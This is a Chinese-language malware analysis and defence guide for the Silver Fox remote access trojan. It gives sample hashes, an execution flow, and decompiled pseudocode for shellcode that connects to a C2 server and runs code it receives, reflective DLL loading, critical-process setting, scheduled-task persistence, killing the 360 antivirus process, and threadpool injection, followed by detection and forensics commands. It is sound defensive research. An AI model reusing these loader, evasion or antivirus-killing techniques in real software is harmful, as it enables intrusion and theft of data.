银狐远控病毒深度分析与防御指南<\/h1>

1. 病毒概述<\/h2>
银狐病毒（Silver Fox RAT）自2022年起活跃，主要针对中国用户和企事业单位，特别是财务、管理和专业领域的从业人员。该病毒通过多种攻击手段传播，具有高度隐蔽性和破坏性。<\/p>

1.1 传播方式<\/h3>

钓鱼邮件<\/strong>：伪装为税务、财务相关文件<\/li>
社交平台恶意链接<\/strong>：通过社交平台分发恶意链接<\/li>
SEO攻击<\/strong>：利用搜索引擎优化使钓鱼网站在搜索结果中排名靠前<\/li>
恶意广告投放<\/strong>：通过广告网络传播<\/li>

多次电子邮件钓鱼活动<\/strong>：持续性钓鱼攻击<\/li> <\/ul>
1.2 主要功能<\/h3>

远程控制受害者设备<\/li>
数据窃取<\/li>
反检测机制<\/li>
强制关闭安全软件（如360安全卫士）<\/li>
持久化驻留<\/li> <\/ul>
2. 技术分析<\/h2>
2.1 样本基本信息<\/h3>

文件名<\/strong>：明细查看_Setup.exe<\/li>
大小<\/strong>：2.67 MB<\/li>
操作系统<\/strong>：Windows(Vista)[AMD64, 64位, GUI]<\/li>
模式<\/strong>：32位<\/li>
类型<\/strong>：EXEC<\/li>
哈希值<\/strong>：

MD5: 1a416558435d62dcca79346e6b839370<\/li>
SHA1: 039e938f5af45edc168c6aa6ebe450f2bc7eddd7<\/li>
SHA256: 035d72733b7ef722b7a8c7f067ff558f04c737cf0231aea54a6567a39ef84aea<\/li> <\/ul> <\/li> <\/ul>
2.2 执行流程<\/h3>

初次远程加载shellcode<\/li>
二次远程加载shellcode<\/li>
反射加载DLL<\/li>
执行DLL中的VFPower函数<\/li>
远程下载并执行强杀360的exe<\/li>
设置自身为系统关键进程<\/li>
通过RPC创建计划任务实现持久化<\/li>
第三次远程加载shellcode执行远控<\/li> <\/ol>
2.3 关键技术细节<\/h3>
2.3.1 远程加载shellcode机制<\/h4>
病毒通过多阶段shellcode加载实现功能：<\/p>
初次加载：<\/strong><\/p>
int<\/span> shellcode_execute_1<\/span>() <\/span><\/span>{ <\/span><\/span> \/\/ 省略部分代码... <\/span><\/span><\/span><\/span> if<\/span> ( dword_6827D0 ) <\/span><\/span> { <\/span><\/span> v1 =<\/span> *<\/span>(_DWORD *<\/span>)dword_6827D0; <\/span><\/span> v2 =<\/span> 0<\/span>; <\/span><\/span> v5 =<\/span> *<\/span>(_DWORD *<\/span>)(dword_6827D0 +<\/span> 4<\/span>); <\/span><\/span> \/\/ 设置异常处理 <\/span><\/span><\/span><\/span> v4[2<\/span>] =<\/span> (unsigned<\/span> int<\/span>)&<\/span>savedregs; <\/span><\/span> v4[1<\/span>] =<\/span> (unsigned<\/span> int<\/span>)&<\/span>loc_40508D; <\/span><\/span> v4[0<\/span>] =<\/span> (unsigned<\/span> int<\/span>)NtCurrentTeb()-><\/span>NtTib.ExceptionList; <\/span><\/span> __writefsdword(0<\/span>, (unsigned<\/span> int<\/span>)v4); <\/span><\/span> <\/span><\/span> \/\/ 执行函数数组中的每个函数 <\/span><\/span><\/span><\/span> if<\/span> ( v1 ><\/span> 0<\/span> ) <\/span><\/span> { <\/span><\/span> do<\/span> { <\/span><\/span> v3 =<\/span> *<\/span>(void<\/span> (**<\/span>)(void<\/span>))(v5 +<\/span> 8<\/span> *<\/span> v2++<\/span>); <\/span><\/span> dword_6827D4 =<\/span> v2; <\/span><\/span> if<\/span> ( v3 ) <\/span><\/span> v3(); <\/span><\/span> } while<\/span> ( v1 ><\/span> v2 ); <\/span><\/span> } <\/span><\/span> \/\/ 恢复异常处理 <\/span><\/span><\/span><\/span> result =<\/span> 0<\/span>; <\/span><\/span> __writefsdword(0<\/span>, v4[0<\/span>]); <\/span><\/span> } <\/span><\/span> return<\/span> result; <\/span><\/span>} <\/span><\/span><\/code><\/pre>二次加载（连接C2服务器156.251.17.245:8852）：<\/strong><\/p> int<\/span> sub_65D174<\/span>() <\/span><\/span>{ <\/span><\/span> \/\/ 初始化Winsock <\/span><\/span><\/span><\/span> WSAStartup(514<\/span>, &<\/span>v1); <\/span><\/span> <\/span><\/span> \/\/ 创建socket <\/span><\/span><\/span><\/span> v14 =<\/span> socket(2<\/span>, 1<\/span>, 0<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 设置目标地址和端口 <\/span><\/span><\/span><\/span> v11[0<\/span>] =<\/span> 2<\/span>; \/\/ AF_INET <\/span><\/span><\/span><\/span> v11[1<\/span>] =<\/span> htons(8852<\/span>); \/\/ 端口 <\/span><\/span><\/span><\/span> ip_addr =<\/span> 0xF511FB9C<\/span>; \/\/ 156.251.17.245 <\/span><\/span><\/span><\/span> <\/span><\/span> \/\/ 连接C2服务器 <\/span><\/span><\/span><\/span> connect(v14, v11, 16<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 接收shellcode <\/span><\/span><\/span><\/span> while<\/span> ( 1<\/span> ) { <\/span><\/span> v18 =<\/span> recv(v14, (char<\/span> *<\/span>)v13 +<\/span> v17, 4096<\/span>, 0<\/span>); <\/span><\/span> if<\/span> ( v18 <=<\/span> 0<\/span> ) <\/span><\/span> break<\/span>; <\/span><\/span> v17 +=<\/span> v18; <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 执行shellcode <\/span><\/span><\/span><\/span> return<\/span> v13(); <\/span><\/span>} <\/span><\/span><\/code><\/pre>2.3.2 反射加载DLL技术<\/h4> 病毒使用内存反射加载技术绕过传统DLL加载方式：<\/p> 动态获取API地址<\/strong>：<\/li> <\/ol> \/\/ 动态获取VirtualAlloc等关键API <\/span><\/span><\/span><\/span>v94 =<\/span> 0xC000C<\/span>; <\/span><\/span>v95 =<\/span> v106; <\/span><\/span>((void<\/span> (__stdcall<\/span> *<\/span>)(int<\/span>, int<\/span> *<\/span>, _DWORD, int<\/span> (__stdcall<\/span> **<\/span>)(_DWORD, int<\/span>, int<\/span>, int<\/span>)))ProcedureAddress)( <\/span><\/span> v97, &<\/span>v94, 0<\/span>, &<\/span>VirtualAlloc); <\/span><\/span><\/code><\/pre> PE结构校验<\/strong>：<\/li> <\/ol> \/\/ 检查PE头标志 <\/span><\/span><\/span><\/span>str_PE =<\/span> &<\/span>a1[*<\/span>((_DWORD *<\/span>)a1 +<\/span> 15<\/span>)]; <\/span><\/span>if<\/span> ( *<\/span>(_DWORD *<\/span>)str_PE !=<\/span> '<\/span>EP'<\/span> ) \/\/ "PE\0\0" <\/span><\/span><\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span> <\/span><\/span>\/\/ 检查可选头大小 <\/span><\/span><\/span><\/span>if<\/span> ( *<\/span>((_WORD *<\/span>)str_PE +<\/span> 2<\/span>) !=<\/span> 332<\/span> ) <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span> <\/span><\/span>\/\/ 检查DLL特性 <\/span><\/span><\/span><\/span>v10 =<\/span> *<\/span>((_DWORD *<\/span>)str_PE +<\/span> 14<\/span>); <\/span><\/span>if<\/span> ( (v10 &<\/span> 1<\/span>) !=<\/span> 0<\/span> ) <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span><\/code><\/pre> 内存加载与执行<\/strong>：<\/li> <\/ol> \/\/ 分配内存并加载DLL <\/span><\/span><\/span><\/span>v13 =<\/span> (int<\/span> (*<\/span>)(void<\/span>))VirtualAlloc(0<\/span>, 122880<\/span>, 12288<\/span>, 64<\/span>); <\/span><\/span> <\/span><\/span>\/\/ 刷新指令缓存 <\/span><\/span><\/span><\/span>if<\/span> ( FlushInstructionCache ) <\/span><\/span> FlushInstructionCache(-<\/span>1<\/span>, 0<\/span>, 0<\/span>); <\/span><\/span> <\/span><\/span>\/\/ 执行DLL入口点 <\/span><\/span><\/span><\/span>return<\/span> v13<\/span>(); <\/span><\/span><\/code><\/pre>2.3.3 反检测技术<\/h4> 1. 进程注入技术<\/strong>：<\/p> \/\/ 查找目标进程 <\/span><\/span><\/span><\/span>v4 =<\/span> ((int<\/span> (__stdcall<\/span> *<\/span>)(int<\/span>, _DWORD))kernel32_CreateToolhelp32Snapshot)(2<\/span>, 0<\/span>); <\/span><\/span>if<\/span> ( v4 !=<\/span> -<\/span>1<\/span> ) { <\/span><\/span> v5[0<\/span>] =<\/span> 556<\/span>; <\/span><\/span> if<\/span> ( ((int<\/span> (__stdcall<\/span> *<\/span>)(int<\/span>, _DWORD *<\/span>))kernel32_Process32FirstW)(v4, v5) ) { <\/span><\/span> do<\/span> { <\/span><\/span> \/\/ 检查是否为360进程 <\/span><\/span><\/span><\/span> if<\/span> ( !<\/span>((int<\/span> (__cdecl<\/span> *<\/span>)(_BYTE *<\/span>, int<\/span>))ucrtbase__wcsicmp)(v6, v2) ) { <\/span><\/span> ((void<\/span> (__stdcall<\/span> *<\/span>)(int<\/span>))kernel32_CloseHandle)(v4); <\/span><\/span> return<\/span> 1<\/span>; <\/span><\/span> } <\/span><\/span> } while<\/span> ( ((int<\/span> (__stdcall<\/span> *<\/span>)(int<\/span>, _DWORD *<\/span>))kernel32_Process32NextW)(v4, v5) ); <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>2. 设置自身为关键进程<\/strong>：<\/p> \/\/ 提权 <\/span><\/span><\/span><\/span>RtlAdjustPrivilege(0x14u<\/span>, 1u<\/span>, 0<\/span>, &<\/span>v31); \/\/ SE_DEBUG_PRIVILEGE <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ 设置为关键进程 <\/span><\/span><\/span><\/span>RtlSetProcessIsCritical(1<\/span>, 0<\/span>, 0<\/span>); \/\/ 进程被终止会导致系统蓝屏 <\/span><\/span><\/span><\/code><\/pre>3. 持久化技术<\/strong>：<\/p> \/\/ 通过RPC创建计划任务 <\/span><\/span><\/span><\/span>RPC_BINDING_HANDLE sub_10004C70<\/span>() <\/span><\/span>{ <\/span><\/span> \/\/ 绑定到计划任务服务 <\/span><\/span><\/span><\/span> RpcStringBindingComposeW(0<\/span>, L<\/span>"ncacn_np"<\/span>, (RPC_WSTR)L<\/span>"localhost"<\/span>, L<\/span>"<\/span>\\<\/span>pipe<\/span>\\<\/span>atsvc"<\/span>, 0<\/span>, &<\/span>StringBinding); <\/span><\/span> RpcBindingFromStringBindingW(StringBinding, &<\/span>Binding); <\/span><\/span> <\/span><\/span> \/\/ 设置认证信息 <\/span><\/span><\/span><\/span> SecurityQos.Version =<\/span> 1<\/span>; <\/span><\/span> SecurityQos.ImpersonationType =<\/span> 3<\/span>; \/\/ SecurityImpersonation <\/span><\/span><\/span><\/span> SecurityQos.Capabilities =<\/span> 0<\/span>; <\/span><\/span> SecurityQos.IdentityTracking =<\/span> 0<\/span>; <\/span><\/span> RpcBindingSetAuthInfoExA(Binding, 0<\/span>, 6u<\/span>, 0xAu<\/span>, 0<\/span>, 0<\/span>, &<\/span>SecurityQos); <\/span><\/span> <\/span><\/span> return<\/span> Binding; <\/span><\/span>} <\/span><\/span><\/code><\/pre>2.3.4 强杀360技术<\/h4> 1. 进程遍历与终止<\/strong>：<\/p> \/\/ 遍历进程查找360tray.exe <\/span><\/span><\/span><\/span>while<\/span> ( 1<\/span> ) { <\/span><\/span> if<\/span> ( !<\/span>v13(v17, "360tray.exe"<\/span>) ) { <\/span><\/span> \/\/ 打开进程 <\/span><\/span><\/span><\/span> v4 =<\/span> v11(1<\/span>i64, 0<\/span>i64, v16); <\/span><\/span> if<\/span> ( v4 ) { <\/span><\/span> \/\/ 终止进程 <\/span><\/span><\/span><\/span> v12(v4, 0<\/span>i64); <\/span><\/span> v7(v4); <\/span><\/span> } <\/span><\/span> goto<\/span> LABEL_13; <\/span><\/span> } <\/span><\/span> \/\/ 检查另一个可能的进程名 <\/span><\/span><\/span><\/span> if<\/span> ( !<\/span>v13(v17, "360Tray.exe"<\/span>) ) <\/span><\/span> break<\/span>; <\/span><\/span> if<\/span> ( !<\/span>v10(v3, &<\/span>v15) ) <\/span><\/span> goto<\/span> LABEL_13; <\/span><\/span>} <\/span><\/span><\/code><\/pre>2. 线程池注入技术<\/strong>：<\/p> \/\/ 创建线程池等待对象 <\/span><\/span><\/span><\/span>ThreadpoolWait =<\/span> CreateThreadpoolWait((PTP_WAIT_CALLBACK)v23, 0<\/span>i64, 0<\/span>i64); <\/span><\/span> <\/span><\/span>\/\/ 在目标进程中分配内存 <\/span><\/span><\/span><\/span>v25 =<\/span> VirtualAllocEx(v11, 0<\/span>i64, 0x1D8u<\/span>i64, 0x3000u<\/span>, 4u<\/span>); <\/span><\/span>WriteProcessMemory(v11, v25, ThreadpoolWait, 0x1D8u<\/span>i64, 0<\/span>i64); <\/span><\/span> <\/span><\/span>\/\/ 创建事件并关联 <\/span><\/span><\/span><\/span>EventW =<\/span> CreateEventW(0<\/span>i64, 0<\/span>, 0<\/span>, L<\/span>"asdEvent"<\/span>); <\/span><\/span>ZwAssociateWaitCompletionPacket(*<\/span>((_QWORD *<\/span>)ThreadpoolWait +<\/span> 46<\/span>), qword_7FF648BE9CB8, EventW, v26, v25); <\/span><\/span>SetEvent(EventW); \/\/ 触发执行 <\/span><\/span><\/span><\/code><\/pre>3. 防御措施<\/h2> 3.1 预防措施<\/h3> 终端防护<\/strong>：<\/p> 部署具有行为检测能力的终端安全软件<\/li> 启用应用程序控制策略<\/li> 限制PowerShell等脚本解释器的使用<\/li> <\/ul> <\/li> 网络防护<\/strong>：<\/p> 在网络边界拦截已知C2地址（如156.251.17.245）<\/li> 监控异常外联行为<\/li> 实施严格的出站连接控制<\/li> <\/ul> <\/li> 邮件安全<\/strong>：<\/p> 部署高级邮件安全网关<\/li> 对可疑附件进行沙箱分析<\/li> 教育用户识别钓鱼邮件<\/li> <\/ul> <\/li> <\/ol> 3.2 检测措施<\/h3> 行为检测指标<\/strong>：<\/p> 进程尝试获取SE_DEBUG_PRIVILEGE权限<\/li> 异常的内存分配和代码执行模式<\/li> 进程尝试设置自身为关键进程<\/li> 异常的线程池注入行为<\/li> <\/ul> <\/li> 日志监控<\/strong>：<\/p> # 监控计划任务创建事件<\/span> <\/span><\/span>Get-WinEvent -FilterHashtable @{ <\/span><\/span> LogName='Security'<\/span> <\/span><\/span> ID='4698'<\/span> # 计划任务创建<\/span> <\/span><\/span>} | Where-Object {$_.Properties[8].Value -like<\/span> "*atsvc*"<\/span>} <\/span><\/span> <\/span><\/span># 监控进程创建事件<\/span> <\/span><\/span>Get-WinEvent -FilterHashtable @{ <\/span><\/span> LogName='Security'<\/span> <\/span><\/span> ID='4688'<\/span> # 新进程创建<\/span> <\/span><\/span>} | Where-Object {$_.Properties[5].Value -like<\/span> "*360tray.exe*"<\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3.3 响应措施<\/h3> 隔离受影响系统<\/strong>：<\/p> 立即断开网络连接<\/li> 不要关闭系统以避免触发蓝屏<\/li> <\/ul> <\/li> 取证分析<\/strong>：<\/p> # 收集进程信息<\/span> <\/span><\/span>Get-Process | Select-Object Id, Name, Path, Company | Export-Csv -Path Processes.csv <\/span><\/span> <\/span><\/span># 收集网络连接<\/span> <\/span><\/span>Get-NetTCPConnection | Where-Object {$_.State -eq<\/span> "Established"<\/span>} | Export-Csv -Path NetworkConnections.csv <\/span><\/span> <\/span><\/span># 收集计划任务<\/span> <\/span><\/span>Get-ScheduledTask | Select-Object TaskName, TaskPath, State, Actions | Export-Csv -Path ScheduledTasks.csv <\/span><\/span><\/code><\/pre><\/li> 恢复措施<\/strong>：<\/p> 从备份恢复系统<\/li> 重置所有凭据<\/li> 全面扫描所有可写共享<\/li> <\/ul> <\/li> <\/ol> 4. 技术总结<\/h2> 银狐远控病毒展现了高级攻击技术的多个方面：<\/p> 多阶段加载<\/strong>：通过多级shellcode加载增加分析难度<\/li> 反检测技术<\/strong>：使用内存反射加载、关键进程保护和进程注入<\/li> 持久化机制<\/strong>：通过RPC创建计划任务实现长期驻留<\/li> 对抗安全软件<\/strong>：专门针对360安全卫士等安全产品<\/li> 模块化设计<\/strong>：不同功能由不同模块实现，便于更新和扩展<\/li> <\/ol> 防御此类高级威胁需要纵深防御策略，结合预防、检测和响应措施，并保持安全解决方案的持续更新。<\/p>

银狐远控病毒深度分析与防御指南<\/h1>

1. 病毒概述<\/h2> 银狐病毒（Silver Fox RAT）自2022年起活跃，主要针对中国用户和企事业单位，特别是财务、管理和专业领域的从业人员。该病毒通过多种攻击手段传播，具有高度隐蔽性和破坏性。<\/p>

2. 技术分析<\/h2>

2.3 关键技术细节<\/h3>

3. 防御措施<\/h2>

1. 病毒概述<\/h2>
银狐病毒（Silver Fox RAT）自2022年起活跃，主要针对中国用户和企事业单位，特别是财务、管理和专业领域的从业人员。该病毒通过多种攻击手段传播，具有高度隐蔽性和破坏性。<\/p>